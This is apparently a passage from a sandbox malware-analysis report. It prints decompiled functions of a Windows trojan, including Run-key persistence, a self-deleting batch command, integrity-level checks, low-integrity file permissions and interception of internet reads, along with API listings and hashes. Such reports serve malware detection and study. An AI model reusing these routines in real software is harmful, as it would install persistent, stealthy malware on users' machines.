                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: File$CharCloseCreateEnvironmentFreeHandleHeapPathTempVariableWrite
                • String ID: /c "%s"$@echo off%sdel /F "%s"$ComSpec$bat
                • API String ID: 1639923935-3344086482
                • Opcode ID: 70087b90885a3d485b699138e7d85fffdda7bfff4a2d4fd2bbd12a3c535562a3
                • Instruction ID: 2bd4613fb3dc1b0ba9d75ff118508478ec04c89fc055936f25eb8791cad67ff0
                • Opcode Fuzzy Hash: 70087b90885a3d485b699138e7d85fffdda7bfff4a2d4fd2bbd12a3c535562a3
                • Instruction Fuzzy Hash: D321B4725011086ADF10EAA5CC46FEE73BCDB44314F2045B7F509F21D1D6789B998B69
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 95%
                			E0040F44B(void* __ecx) {
                				long _v8;
                				void* _v12;
                				char* _t21;
                				signed char _t22;
                				DWORD* _t25;
                				void* _t35;
                
                				_t28 = 0;
                				if(OpenProcessToken(0xffffffff, 8,  &_v12) == 0) {
                					L15:
                					return _t28;
                				}
                				if(GetTokenInformation(_v12, 0x19, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
                					L14:
                					CloseHandle(_v12);
                					goto L15;
                				} else {
                					_t16 = _v8;
                					if(_v8 == 0) {
                						goto L14;
                					}
                					_t35 = E004097CC(_t16);
                					if(_t35 == 0) {
                						L13:
                						goto L14;
                					}
                					if(GetTokenInformation(_v12, 0x19, _t35, _v8,  &_v8) != 0) {
                						_t21 = GetSidSubAuthorityCount( *_t35);
                						if(_t21 != 0) {
                							_t22 =  *_t21;
                							if(_t22 > 0) {
                								_t25 = GetSidSubAuthority( *_t35, (_t22 & 0x000000ff) - 1);
                								if(_t25 != 0) {
                									if( *_t25 >= 0x2000) {
                										asm("sbb bl, bl");
                										_t28 = 3;
                									} else {
                										_t28 = 1;
                									}
                								}
                							}
                						}
                					}
                					E004097F7(_t35);
                					goto L13;
                				}
                			}









                0x0040f459
                0x0040f463
                0x0040f4fd
                0x0040f501
                0x0040f501
                0x0040f47f
                0x0040f4f3
                0x0040f4f6
                0x00000000
                0x0040f48c
                0x0040f48c
                0x0040f491
                0x00000000
                0x00000000
                0x0040f499
                0x0040f49d
                0x0040f4f2
                0x00000000
                0x0040f4f2
                0x0040f4b0
                0x0040f4b4
                0x0040f4bc
                0x0040f4be
                0x0040f4c2
                0x0040f4cb
                0x0040f4d3
                0x0040f4dc
                0x0040f4e7
                0x0040f4e9
                0x0040f4de
                0x0040f4de
                0x0040f4de
                0x0040f4dc
                0x0040f4d3
                0x0040f4c2
                0x0040f4bc
                0x0040f4ed
                0x00000000
                0x0040f4ed

                APIs
                • OpenProcessToken.ADVAPI32(000000FF,00000008,?,00000000,?,?,?,00407564,00000000,00407832,?,00000000), ref: 0040F45B
                • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,00000000,?,?,?,?,00407564,00000000,00407832,?,00000000), ref: 0040F47B
                • GetLastError.KERNEL32(?,?,?,?,00407564,00000000,00407832,?,00000000), ref: 0040F481
                  • Part of subcall function 004097CC: HeapAlloc.KERNEL32(00000008,-00000004,0040F499,00000000,?,?,?,?,00407564,00000000,00407832,?,00000000), ref: 004097D8
                • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?,?,?,?,00407564,00000000,00407832,?,00000000), ref: 0040F4AC
                • GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,?,00407564,00000000,00407832,?,00000000), ref: 0040F4B4
                • GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,?,00407564,00000000,00407832,?,00000000), ref: 0040F4CB
                • CloseHandle.KERNEL32(?,?,?,?,?,00407564,00000000,00407832,?,00000000), ref: 0040F4F6
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: Token$AuthorityInformation$AllocCloseCountErrorHandleHeapLastOpenProcess
                • String ID:
                • API String ID: 2107185229-0
                • Opcode ID: 38e15f6b2d6601b6d3c3f124dba1bcd5177b35f8b0e923fcbaa375b174d6ed31
                • Instruction ID: 0b892696b9090dc08235a5fb8a431d8a2efc73d22333941e1aa92e08f95fe61b
                • Opcode Fuzzy Hash: 38e15f6b2d6601b6d3c3f124dba1bcd5177b35f8b0e923fcbaa375b174d6ed31
                • Instruction Fuzzy Hash: C7118132600009AFEB315F94DE84EAF7BADEB11354F240476F940F65A1D7399E89E628
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040EEE6(void* __ecx, void* _a4, short* _a8, short* _a12, int* _a16, char** _a20) {
                				int _v8;
                				int* _v12;
                				int _t30;
                				char* _t41;
                
                				_v12 = _v12 | 0xffffffff;
                				 *_a20 = 0;
                				if(_a8 == 0 || RegOpenKeyExW(_a4, _a8, 0, 1,  &_a4) == 0) {
                					_v8 = 0;
                					if(RegQueryValueExW(_a4, _a12, 0, _a16, 0,  &_v8) == 0) {
                						_t30 = _v8;
                						if(_t30 != 0) {
                							_t31 = _t30 + 4;
                							if(_t30 + 4 != 0) {
                								_t41 = E004097CC(_t31);
                								if(_t41 != 0) {
                									if(RegQueryValueExW(_a4, _a12, 0, _a16, _t41,  &_v8) == 0) {
                										 *_a20 = _t41;
                										_v12 = _v8;
                									} else {
                										E004097F7(_t41);
                									}
                								}
                							}
                						} else {
                							_v12 = 0;
                						}
                					}
                					if(_a8 != 0) {
                						RegCloseKey(_a4);
                					}
                					goto L13;
                				} else {
                					L13:
                					return _v12;
                				}
                			}







                0x0040eeeb
                0x0040eef5
                0x0040eefa
                0x0040ef22
                0x0040ef30
                0x0040ef32
                0x0040ef37
                0x0040ef3e
                0x0040ef43
                0x0040ef4b
                0x0040ef4f
                0x0040ef64
                0x0040ef71
                0x0040ef76
                0x0040ef66
                0x0040ef67
                0x0040ef67
                0x0040ef64
                0x0040ef79
                0x0040ef39
                0x0040ef39
                0x0040ef39
                0x0040ef37
                0x0040ef7e
                0x0040ef83
                0x0040ef83
                0x00000000
                0x0040ef89
                0x0040ef89
                0x0040ef8e
                0x0040ef8e

                APIs
                • RegOpenKeyExW.ADVAPI32(000000FF,?,00000000,00000001,000000FF,SOFTWARE\Microsoft\Qodit,?,?,?,00413F00,80000001,SOFTWARE\Microsoft\Qodit,Ereqeren,00407CD9,?,?), ref: 0040EF09
                  • Part of subcall function 004097CC: HeapAlloc.KERNEL32(00000008,-00000004,0040F499,00000000,?,?,?,?,00407564,00000000,00407832,?,00000000), ref: 004097D8
                • RegQueryValueExW.ADVAPI32(000000FF,?,00000000,00407CD9,00000000,00000049,Ereqeren,SOFTWARE\Microsoft\Qodit,?,?,?,00413F00,80000001,SOFTWARE\Microsoft\Qodit,Ereqeren,00407CD9), ref: 0040EF2C
                • RegQueryValueExW.ADVAPI32(000000FF,?,00000000,00407CD9,00000000,00000049,00000000,?,?,?,00413F00,80000001,SOFTWARE\Microsoft\Qodit,Ereqeren,00407CD9,?), ref: 0040EF60
                  • Part of subcall function 004097F7: HeapFree.KERNEL32(00000000,00000000,0040F4F2,00000000,?,?,?,?,00407564,00000000,00407832), ref: 0040980A
                • RegCloseKey.ADVAPI32(000000FF,?,?,00413F00,80000001,SOFTWARE\Microsoft\Qodit,Ereqeren,00407CD9,?,?), ref: 0040EF83
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: HeapQueryValue$AllocCloseFreeOpen
                • String ID: Ereqeren$SOFTWARE\Microsoft\Qodit
                • API String ID: 1185057095-464494599
                • Opcode ID: 1adfeacfd77744eb7a5818d497338b45fdb2ec2c4ae775521b88f80f5e8f99c5
                • Instruction ID: 46100616f2e97f8878b45fccea5af6e60a61da11a3fa4edf364ce0fca99450fd
                • Opcode Fuzzy Hash: 1adfeacfd77744eb7a5818d497338b45fdb2ec2c4ae775521b88f80f5e8f99c5
                • Instruction Fuzzy Hash: 7021277550020AFFDF218F96CD80CAFBFB9EB85750B108526F805A6260D375DEA1DB64
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00415834(void* __ecx, void* __eflags) {
                				intOrPtr _v8;
                				intOrPtr _v12;
                				char _v112;
                				char _v632;
                				void* __edi;
                				void* __esi;
                				intOrPtr _t16;
                				void* _t36;
                				WCHAR* _t39;
                
                				_t36 = __ecx;
                				SetThreadPriority(GetCurrentThread(), 0);
                				_t16 = E00407A11(_t36, 0x19367401, 1);
                				_v12 = _t16;
                				if(_t16 != 0) {
                					E004079D9(0xff220823,  &_v112, 0);
                					_t39 =  &_v632;
                					E00407BD4(_t36, _t39, 0, 0);
                					PathQuoteSpacesW(_t39);
                					_t37 = _t39;
                					_v8 = E0040A3AA(_t39);
                					if(E00407B3F() == 0) {
                						L7:
                						E0040DD1D(_v12);
                						return 0;
                					}
                					if(WaitForSingleObject( *0x419798, 0xc8) != 0x102) {
                						L6:
                						goto L7;
                					}
                					_v8 = _v8 + _v8 + 2;
                					do {
                						E0040EE81(_t37, L"Software\\Microsoft\\Windows\\Currentversion\\Run",  &_v112, 1,  &_v632, _v8);
                					} while (WaitForSingleObject( *0x419798, 0xc8) == 0x102);
                					goto L6;
                				}
                				return 1;
                			}












                0x00415834
                0x00415848
                0x00415855
                0x0041585a
                0x0041585f
                0x00415874
                0x0041587a
                0x00415880
                0x00415888
                0x0041588e
                0x00415895
                0x0041589f
                0x004158ef
                0x004158f2
                0x00000000
                0x004158f9
                0x004158bb
                0x004158ee
                0x00000000
                0x004158ee
                0x004158c4
                0x004158c7
                0x004158dc
                0x004158ea
                0x00000000
                0x004158c7
                0x00000000

                APIs
                • GetCurrentThread.KERNEL32 ref: 00415841
                • SetThreadPriority.KERNEL32(00000000), ref: 00415848
                  • Part of subcall function 00407A11: CreateMutexW.KERNEL32(0041930C,00000000,?,?,?,?,?), ref: 00407A32
                • PathQuoteSpacesW.SHLWAPI(?,00000000,FF220823,?,00000000,?,19367401,00000001), ref: 00415888
                • WaitForSingleObject.KERNEL32(000000C8,?,?,19367401,00000001), ref: 004158B4
                • WaitForSingleObject.KERNEL32(000000C8,Software\Microsoft\Windows\Currentversion\Run,?,00000001,?,?,?,?,19367401,00000001), ref: 004158E8
                Strings
                • Software\Microsoft\Windows\Currentversion\Run, xrefs: 004158D7
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: ObjectSingleThreadWait$CreateCurrentMutexPathPriorityQuoteSpaces
                • String ID: Software\Microsoft\Windows\Currentversion\Run
                • API String ID: 123286213-3548470437
                • Opcode ID: 843315c493ea4593c9cc4102cf01530f3c52d7d6a8f2f028cfab193abd351bbd
                • Instruction ID: 5403b607c557c4c5fbc9cf29adff4b919678268e02161f6a1b081f58063b7407
                • Opcode Fuzzy Hash: 843315c493ea4593c9cc4102cf01530f3c52d7d6a8f2f028cfab193abd351bbd
                • Instruction Fuzzy Hash: 70119D71E00118AEDB11BBA19C85DEE7B7DEF84308F10447AF905F7191D6385E928B99
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040E875(short* _a4) {
                				char _v5;
                				int _v12;
                				void* _v16;
                				void* _v20;
                				int _v24;
                				long _t18;
                
                				_v5 = 0;
                				_t18 = RegCreateKeyExW(0x80000001, L"SOFTWARE\\Microsoft", 0, 0, 0, 4, 0,  &_v16, 0);
                				_t33 = _t18;
                				if(_t18 == 0) {
                					_v12 = 0;
                					do {
                						E0040E6D9(6, 4, _t33, 2, _a4);
                						if(RegCreateKeyExW(_v16, _a4, 0, 0, 0, 3, 0,  &_v20,  &_v24) != 0) {
                							goto L4;
                						} else {
                							RegCloseKey(_v20);
                							if(_v24 == 1) {
                								_v5 = 1;
                							} else {
                								goto L4;
                							}
                						}
                						L7:
                						RegCloseKey(_v16);
                						goto L8;
                						L4:
                						_v12 = _v12 + 1;
                					} while (_v12 < 0x64);
                					goto L7;
                				}
                				L8:
                				return _v5;
                			}









                0x0040e89a
                0x0040e89d
                0x0040e89f
                0x0040e8a1
                0x0040e8aa
                0x0040e8ad
                0x0040e8b6
                0x0040e8d3
                0x00000000
                0x0040e8d5
                0x0040e8d8
                0x0040e8de
                0x0040e8eb
                0x00000000
                0x00000000
                0x00000000
                0x0040e8de
                0x0040e8ef
                0x0040e8f2
                0x00000000
                0x0040e8e0
                0x0040e8e0
                0x0040e8e3
                0x00000000
                0x0040e8e9
                0x0040e8f5
                0x0040e8fb

                APIs
                • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 0040E89D
                  • Part of subcall function 0040E6D9: CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 0040E7FB
                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000003,00000000,?,?,00000002,?), ref: 0040E8CF
                • RegCloseKey.ADVAPI32(?), ref: 0040E8D8
                • RegCloseKey.ADVAPI32(?), ref: 0040E8F2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: CloseCreate$CharUpper
                • String ID: SOFTWARE\Microsoft$d
                • API String ID: 1794619670-1227932965
                • Opcode ID: 533a63e244da6762766b3e8d58623738a9e6d1c2019b3e1c3d54652976b1b9b2
                • Instruction ID: 40e2ae33d276945f0e3d46e165ef63a88525fa2e087ad4151fde08719faaf157
                • Opcode Fuzzy Hash: 533a63e244da6762766b3e8d58623738a9e6d1c2019b3e1c3d54652976b1b9b2
                • Instruction Fuzzy Hash: C8115EB290021CBEEB01AB95DC81EEFBB7DEF04388F104476F601B2291D2759E559B74
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00411954(WCHAR* __ebx, void* __ecx, char _a4) {
                				void* __edi;
                				void* __esi;
                				long _t3;
                				WCHAR* _t13;
                				WCHAR* _t19;
                				WCHAR* _t20;
                
                				_t13 = __ebx;
                				_t19 = L"C:\\Users\\Jamey\\AppData\\Roaming\\Ytveig\\adyq.cik";
                				_t20 = L"C:\\Users\\Jamey\\AppData\\Roaming\\Ytveig";
                				if(L"C:\\Users\\Jamey\\AppData\\Roaming\\Ytveig\\adyq.cik" == 0) {
                					E00407BD4(__ecx, _t19, _t20, 1);
                					 *((short*)(E00409833(_t20, _t19, E0040A3AA(_t19) + _t10) + L"C:\\Users\\Jamey\\AppData\\Roaming\\Ytveig")) = 0;
                					_t3 = PathRemoveFileSpecW(_t20);
                				}
                				if(_t13 != 0) {
                					E00409AD3(_t3 | 0xffffffff, _t19, _t13);
                					_t3 = PathRenameExtensionW(_t13, L".tmp");
                				}
                				if(_a4 != 0 &&  *0x41953c > 1) {
                					E0040B3BA(_t20);
                					E0040DBD3(_t20);
                					_t3 = GetFileAttributesW(_t19);
                					if(_t3 != 0xffffffff) {
                						return E0040DBD3(_t19);
                					}
                				}
                				return _t3;
                			}









                0x00411954
                0x0041195e
                0x00411963
                0x00411968
                0x0041196c
                0x00411985
                0x0041198c
                0x0041198c
                0x00411994
                0x0041199d
                0x004119a8
                0x004119a8
                0x004119b3
                0x004119bf
                0x004119c5
                0x004119cb
                0x004119d4
                0x00000000
                0x004119d7
                0x004119d4
                0x004119de

                APIs
                • PathRemoveFileSpecW.SHLWAPI(C:\Users\Jamey\AppData\Roaming\Ytveig,C:\Users\Jamey\AppData\Roaming\Ytveig,C:\Users\Jamey\AppData\Roaming\Ytveig\adyq.cik,00000000,00000001,00000000,00020000,00412435,00000001,?,8793AEF0,00000002,00002723,00020000,00000000,00002722), ref: 0041198C
                • PathRenameExtensionW.SHLWAPI(00000000,.tmp,00000000,00020000,00412435,00000001,?,8793AEF0,00000002,00002723,00020000,00000000,00002722,00020000,?,?), ref: 004119A8
                • GetFileAttributesW.KERNEL32(C:\Users\Jamey\AppData\Roaming\Ytveig\adyq.cik,C:\Users\Jamey\AppData\Roaming\Ytveig,C:\Users\Jamey\AppData\Roaming\Ytveig,00000000,00020000,00412435,00000001,?,8793AEF0,00000002,00002723,00020000,00000000,00002722,00020000,?), ref: 004119CB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: FilePath$AttributesExtensionRemoveRenameSpec
                • String ID: .tmp$C:\Users\Jamey\AppData\Roaming\Ytveig$C:\Users\Jamey\AppData\Roaming\Ytveig\adyq.cik
                • API String ID: 3957249617-106506248
                • Opcode ID: 770158e217f8fabb34e54a4ff136bd286ebedb6e779732a109474c606ce93d48
                • Instruction ID: a9a3f87515d9d1dcb4a58fb71e146e3ce457fbc5cca0916897b843bc0c201031
                • Opcode Fuzzy Hash: 770158e217f8fabb34e54a4ff136bd286ebedb6e779732a109474c606ce93d48
                • Instruction Fuzzy Hash: FAF0F271A1129025D7113B329D49AFF356A8F82324F18813FB521B12E2CBBC4CC286AE
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 45%
                			E0040DBD3(intOrPtr _a4) {
                				struct _ACL* _v8;
                				struct _SECURITY_DESCRIPTOR* _v12;
                				int _v16;
                				int _v20;
                				void** _t11;
                				int _t16;
                				struct _ACL* _t18;
                
                				_t18 = 0;
                				E0040F3C3(L"SeSecurityPrivilege");
                				_push(0);
                				_t11 =  &_v12;
                				_push(_t11);
                				_push(1);
                				_push(L"S:(ML;CIOI;NRNWNX;;;LW)");
                				L00415950();
                				if(_t11 != 0) {
                					_v8 = 0;
                					_t16 = GetSecurityDescriptorSacl(_v12,  &_v20,  &_v8,  &_v16);
                					if(_t16 != 0) {
                						__imp__SetNamedSecurityInfoW(_a4, 1, 0x10, 0, 0, 0, _v8);
                						if(_t16 == 0) {
                							_t18 = 1;
                						}
                					}
                					LocalFree(_v12);
                				}
                				return _t18;
                			}










                0x0040dbdf
                0x0040dbe1
                0x0040dbe6
                0x0040dbe7
                0x0040dbea
                0x0040dbeb
                0x0040dbed
                0x0040dbf2
                0x0040dbf9
                0x0040dc0a
                0x0040dc0d
                0x0040dc15
                0x0040dc24
                0x0040dc2c
                0x0040dc2e
                0x0040dc2e
                0x0040dc2c
                0x0040dc33
                0x0040dc33
                0x0040dc3d

                APIs
                  • Part of subcall function 0040F3C3: GetCurrentThread.KERNEL32 ref: 0040F3D3
                  • Part of subcall function 0040F3C3: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,00408579,SeTcbPrivilege), ref: 0040F3DA
                  • Part of subcall function 0040F3C3: OpenProcessToken.ADVAPI32(000000FF,00000020,?,?,?,?,?,?,?,?,?,?,00408579,SeTcbPrivilege), ref: 0040F3EC
                • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,00000000,00000000), ref: 0040DBF2
                • GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,00000000,S:(ML;CIOI;NRNWNX;;;LW),00000001,00000000,00000000,SeSecurityPrivilege,00000000), ref: 0040DC0D
                • SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,?), ref: 0040DC24
                • LocalFree.KERNEL32(00000000), ref: 0040DC33
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: Security$Descriptor$OpenThreadToken$ConvertCurrentFreeInfoLocalNamedProcessSaclString
                • String ID: S:(ML;CIOI;NRNWNX;;;LW)$SeSecurityPrivilege
                • API String ID: 3555451682-1937014404
                • Opcode ID: ce89749bd0abad5c7769c3836abe1dc1d4bf861e46c746144d31045149a7338c
                • Instruction ID: f98c02f58e4d6ebcc571847f5be9e642b85eab39ae92dc3a7b900450a8a6e01d
                • Opcode Fuzzy Hash: ce89749bd0abad5c7769c3836abe1dc1d4bf861e46c746144d31045149a7338c
                • Instruction Fuzzy Hash: 0EF0817590020CBEEB119FD08D85EEF7B7CAB04344F000033B901B11D1E6B59A58AA68
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00413360(void* __eflags, char* _a4, intOrPtr _a8, signed int _a12, signed int* _a16) {
                				char _v5;
                				char _v12;
                				signed int _v16;
                				long _v20;
                				intOrPtr _v24;
                				char _v28;
                				void* __edi;
                				void* __esi;
                				signed int _t56;
                				void* _t59;
                				signed int* _t60;
                				intOrPtr _t61;
                				signed int _t62;
                				signed int* _t63;
                				signed int _t72;
                				void* _t78;
                				char* _t82;
                				short* _t89;
                				void* _t94;
                				intOrPtr _t96;
                				intOrPtr* _t100;
                				long _t102;
                				signed int _t104;
                				struct _GOPHER_FIND_DATAA _t108;
                
                				_v16 = _v16 | 0xffffffff;
                				EnterCriticalSection(0x41aa38);
                				_t100 = _a4;
                				_t56 = E00412CBF( *_t100);
                				if(_t56 == 0xffffffff) {
                					L35:
                					LeaveCriticalSection(0x41aa38);
                					return _v16;
                				}
                				_t96 =  *0x41aa50; // 0x0
                				_t59 = _t56 * 0x24 + _t96;
                				if( *((intOrPtr*)(_t59 + 0x10)) <= 0) {
                					goto L35;
                				}
                				_t94 = _t59;
                				if( *((intOrPtr*)(_t94 + 0x10)) != 1 || ( *( *(_t94 + 0xc)) & 0x00000003) == 0) {
                					_t60 = _a16;
                					if(_t60 != 0) {
                						 *_t60 =  *_t60 & 0x00000000;
                					}
                					if( *((intOrPtr*)(_t94 + 0x18)) != 0xffffffff) {
                						L22:
                						_t61 =  *((intOrPtr*)(_t94 + 0x18));
                						if(_t61 != 0xffffffff && _v16 == 0xffffffff) {
                							_t62 = _t61 -  *((intOrPtr*)(_t94 + 0x1c));
                							_t104 = _t62;
                							if(_t62 != 0) {
                								if(_a8 == 0) {
                									_a12 = E0040B82B(0x2000, 0x1000);
                								}
                								if(_a12 < _t104) {
                									_t104 = _a12;
                								}
                								if(_a8 != 0) {
                									E00409833(_a8,  *((intOrPtr*)(_t94 + 0x14)) +  *((intOrPtr*)(_t94 + 0x1c)), _t104);
                									 *((intOrPtr*)(_t94 + 0x1c)) =  *((intOrPtr*)(_t94 + 0x1c)) + _t104;
                								}
                							}
                							_t63 = _a16;
                							if(_t63 != 0) {
                								 *_t63 = _t104;
                							}
                							_v16 = 1;
                						}
                						goto L34;
                					}
                					LeaveCriticalSection(0x41aa38);
                					_v5 = E0041323E( &_v20,  *_t100,  *((intOrPtr*)(_t94 + 4)),  &_v12);
                					EnterCriticalSection(0x41aa38);
                					if(_v5 == 0) {
                						L21:
                						_v16 = _v16 & 0x00000000;
                						SetLastError(0x2ee4);
                						goto L22;
                					}
                					_t106 =  *_a4;
                					_t72 = E00412CBF( *_a4);
                					if(_t72 == 0xffffffff) {
                						E004097F7(_v12);
                						goto L21;
                					}
                					_t94 = _t72 * 0x24 +  *0x41aa50;
                					_v24 = E0040AF2B( &_v28, _t106);
                					_t78 = E00404375( *((intOrPtr*)(_t94 + 0x10)),  *(_t94 + 0xc), _t76,  &_v12,  &_v20);
                					_t102 = _v20;
                					if(_t78 != 0) {
                						_t82 = E00409A3C(_v28, 0, _v24);
                						_a4 = _t82;
                						if(_t82 != 0) {
                							_v20 = 0x1000;
                							_t108 = E004097CC(0x1000);
                							if(_t108 != 0) {
                								 *_t108 = 0x50;
                								if(GetUrlCacheEntryInfoW(_a4, _t108,  &_v20) != 0) {
                									_t89 =  *((intOrPtr*)(_t108 + 8));
                									if(_t89 != 0 &&  *_t89 != 0) {
                										E0040AFDF(_t102, _t89, _v12);
                									}
                								}
                								E004097F7(_t108);
                							}
                							E004097F7(_a4);
                						}
                					}
                					E004097F7(_v24);
                					 *((intOrPtr*)(_t94 + 0x14)) = _v12;
                					 *((intOrPtr*)(_t94 + 0x18)) = _t102;
                					goto L22;
                				} else {
                					 *_t100 =  *((intOrPtr*)(_t94 + 0x20));
                					L34:
                					goto L35;
                				}
			}

                APIs
                • EnterCriticalSection.KERNEL32(0041AA38), ref: 00413371
                • LeaveCriticalSection.KERNEL32(0041AA38), ref: 004133D6
                • EnterCriticalSection.KERNEL32(0041AA38), ref: 004133F3
                • GetUrlCacheEntryInfoW.WININET(?,00000000,00000001), ref: 0041347C
                • SetLastError.KERNEL32(00002EE4), ref: 004134CE
                • LeaveCriticalSection.KERNEL32(0041AA38), ref: 00413538
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
• Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: CriticalSection$EnterLeave$CacheEntryErrorInfoLast
                • String ID:
                • API String ID: 3653105453-0
                • Opcode ID: 96fb809e956990848bc62048120db38640ec5e7c3259e41cd5edcdccd39a15b1
                • Instruction ID: cd49f25b1dbb4c9b6420f754db66c36a11ae88ba76f33cf03904b4d841ce925c
                • Opcode Fuzzy Hash: 96fb809e956990848bc62048120db38640ec5e7c3259e41cd5edcdccd39a15b1
                • Instruction Fuzzy Hash: D5519A31900205ABCF15DF65C984ADE7BB4AF04365F0481AAF811BB2E2C778DE91CB99
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E0041323E(intOrPtr* __edi, intOrPtr _a4, void* _a8, intOrPtr* _a12) {
                				intOrPtr _v28;
                				signed int _v44;
                				void* _v52;
                				intOrPtr _v56;
                				char _v61;
                				intOrPtr _v64;
                				signed int _v72;
                				intOrPtr _v76;
                				char _v77;
                				intOrPtr _v84;
                				intOrPtr _v85;
                				char _v89;
                				void* __esi;
                				void* _t30;
                				intOrPtr _t31;
                				void** _t36;
                				intOrPtr _t43;
                				intOrPtr* _t57;
                				intOrPtr _t61;
                				intOrPtr* _t62;
                				intOrPtr _t64;
                
                				_t62 = __edi;
                				ResetEvent(_a8);
                				_t30 = HeapAlloc( *0x41a570, 8, 0x1004);
                				_t64 = 0;
                				_v52 = _t30;
                				if(_t30 != 0) {
                					_t57 = __imp__InternetSetStatusCallbackW;
                					_t31 =  *_t57(_a4, E004131F5);
                					_t61 = 0x28;
                					_v56 = _t31;
                					 *_a12 = 0;
                					 *__edi = 0;
                					_v61 = 1;
                					E004098AA( &_v52,  &_v52, 0, _t61);
                					_v64 = _t61;
                					_v44 = _v72;
                					while(1) {
                						L3:
                						_t36 =  &_v52;
                						_v28 = 0x1000;
                						__imp__InternetReadFileExA(_a4, _t36, 8, _t64);
                						if(_t36 == 0) {
                							break;
                						}
                						if(_v44 != _t64) {
                							_t66 = _a12;
                							if(E00409787( *_t62 + _v44, _a12) == 0) {
                								L9:
                								_v77 = 0;
                							} else {
                								E00409833( *_t66 +  *_t62, _v76, _v44);
                								 *_t62 =  *_t62 + _v56;
                								_t64 = 0;
                								continue;
                							}
                						}
                						L10:
                						asm("sbb eax, eax");
                						 *_t57(_a4,  ~(_v72 + 1) & _v72);
                						E004097F7(_v84);
                						if(_v89 == 0) {
                							E004097F7( *_a12);
                						}
                						_t43 = _v85;
                						goto L13;
                					}
                					if(GetLastError() != 0x3e5) {
